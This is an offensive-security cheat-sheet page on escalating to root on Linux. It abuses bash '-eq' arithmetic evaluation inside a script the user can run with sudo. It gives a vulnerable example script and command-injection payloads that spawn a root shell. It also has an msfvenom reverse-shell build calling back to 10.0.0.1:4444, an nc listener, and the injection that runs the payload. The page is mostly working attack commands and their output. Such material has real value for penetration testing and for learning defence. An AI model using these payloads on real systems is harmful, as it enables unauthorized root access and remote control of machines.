Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page
  • Investigation
  • Exploitation (Get a Shell Directly)
  • Exploitation (Get a Shell Indirectly)
  • References

Bash eq Privilege Escalation

The `-eq` comaparison in bash script is vulnerable to arbitrary command execution.

PreviousApache Conf Privilege EscalationNextBuffer Overflow Privilege Escalation

Last updated 1 year ago

Please see for details.

sudo -l

(root) /bin/bash /opt/example.sh
Copied!

If we can execute above command as root, and the /opt/example.sh contains the numeric comparison such as [[ $var -eq 42 ]], we can execute arbitrary command.

#!/bin/bash

read -rp "Enter guess: " num

if [[ $num -eq 42 ]]
then
  echo "Correct"
else
  echo "Wrong"
fi
Copied!

To execute arbitrary command, answer this question as below.

sudo /bin/bash /opt/example.sh
Enter guess: a[$(date >&2)]+42
Sun Feb  4 19:06:19 PST 2018
Correct
Copied!

inject arbitrary command before the correct number (42).

It’s easy if we can execute the bash script as root. We only need to insert /bin/sh or /bin/bash command in the answer.

sudo /bin/bash /opt/example.sh
Enter guess: a[$(/bin/sh >&2)]+42
$
Copied!

We can also inject a bash script and execute arbitrary code. First, create a reverse shell script /tmp/shell.elf using msfvenom.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o /tmp/shell.elf
chmod +x /tmp/shell.elf
Copied!

Then start a listener in local machine.

nc -lvnp 4444
Copied!

Now execute the bash script as root.

sudo /bin/bash /opt/example.sh
Enter guess: a[$(/tmp/shell.elf)]+42
Copied!

We should get a root shell in local terminal.

References

Investigation
this post
Exploitation (Get a Shell Directly)
Exploitation (Get a Shell Indirectly)
https://www.vidarholen.net/contents/blog/?p=716
Page cover image